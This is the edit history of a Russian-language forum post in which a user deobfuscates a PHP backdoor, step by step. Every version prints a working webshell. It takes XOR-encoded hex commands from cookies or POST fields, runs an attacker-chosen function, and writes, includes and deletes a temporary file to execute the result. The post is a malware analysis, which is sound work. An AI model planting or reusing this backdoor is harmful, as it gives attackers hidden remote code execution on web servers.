История изменений

Исправление aol, 07.07.24 16:57 (текущая версия) :

function qd8($name, $valueLen)
{
    return substr(
        str_repeat(
            $name . "66d7e659-d870-4645-8e6e-2ac4419c2a30",
            ($valueLen / strlen($name)) + 1
        )
        ,
        0,
        $valueLen
    );
}

function inject($ks12)
{
    if (isset($ks12[2])) {
        $mh13 = "./" . md5("66d7e659-d870-4645-8e6e-2ac4419c2a30") . ".module";
        @file_put_contents($mh13, "<?php @unlink(__FILE__);" . $ks12[1]($ks12[2]));
        @include ($mh13);
        @unlink($mh13);
        exit();
    }
}
foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
    $value = @pack("H*", $value);
    inject(explode("#", $value ^ qd8($key, strlen($value))));
}

Дальше лень. Там уже немного осталось ))

Сам пейлоад, вероятно, передавался в теле post-запроса в виде шестнадцатиричной строки. В коде выше - только распаковка уже.

Исправление aol, 07.07.24 16:50:

function qd8($name, $valueLen)
{
    return substr(
        str_repeat(
            $name . "66d7e659-d870-4645-8e6e-2ac4419c2a30",
            ($valueLen / strlen($name)) + 1
        )
        ,
        0,
        $valueLen
    );
}

function inject($ks12)
{
    if (isset($ks12[2])) {
        $mh13 = "./" . md5("66d7e659-d870-4645-8e6e-2ac4419c2a30") . ".module";
        @file_put_contents($mh13, "<?php @unlink(__FILE__);" . $ks12[1]($ks12[2]));
        @include ($mh13);
        @unlink($mh13);
        exit();
    }
}
foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
    $value = @pack("H*", $value);
    inject(explode("#", $value ^ qd8($key, strlen($value))));
}

Дальше лень. Там уже немного осталось ))

Исправление aol, 07.07.24 16:36:

foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
    function qd8($name, $valueLen)
    {
        return substr(str_repeat($name . "66d7e659-d870-4645-8e6e-2ac4419c2a30", ($valueLen / strlen($name)) + 1), 0, $valueLen);
    }
    function my_pack($ks12)
    {
        return @pack("H*", $ks12);
    }
    function ey9($ks12)
    {
        if (isset($ks12[2])) {
            $mh13 = "./" . md5("66d7e659-d870-4645-8e6e-2ac4419c2a30") . ".module";
            @file_put_contents($mh13, "<?php @unlink(__FILE__);" . $ks12[1]($ks12[2]));
            @include ($mh13);
            @unlink($mh13);
            exit();
        }
    }
    $value = my_pack($value);
    ey9(explode("#", $value ^ qd8($key, strlen($value))));
}

Дальше лень. Там уже немного осталось ))

Исходная версия aol, 07.07.24 16:29:


foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
    function qd8($bi6, $zl14, $cy10)
    {
        return substr(str_repeat($zl14 . "66d7e659-d870-4645-8e6e-2ac4419c2a30", ($cy10 / strlen($zl14)) + 1), 0, $cy10);
    }
    function mb7($bi6, $ks12)
    {
        return @pack("H*", $ks12);
    }
    function ey9($bi6, $ks12)
    {
        if (isset($ks12[2])) {
            $mh13 = "./" . md5("66d7e659-d870-4645-8e6e-2ac4419c2a30") . ".module";
            @file_put_contents($mh13, "<?php @unlink(__FILE__);" . $ks12[1]($ks12[2]));
            @include ($mh13);
            @unlink($mh13);
            exit();
        }
    }
    $value = mb7($bi6, $value);
    ey9($bi6, explode("#", $value ^ qd8($bi6, $key, strlen($value))));
}

Дальше лень. Там уже немного осталось ))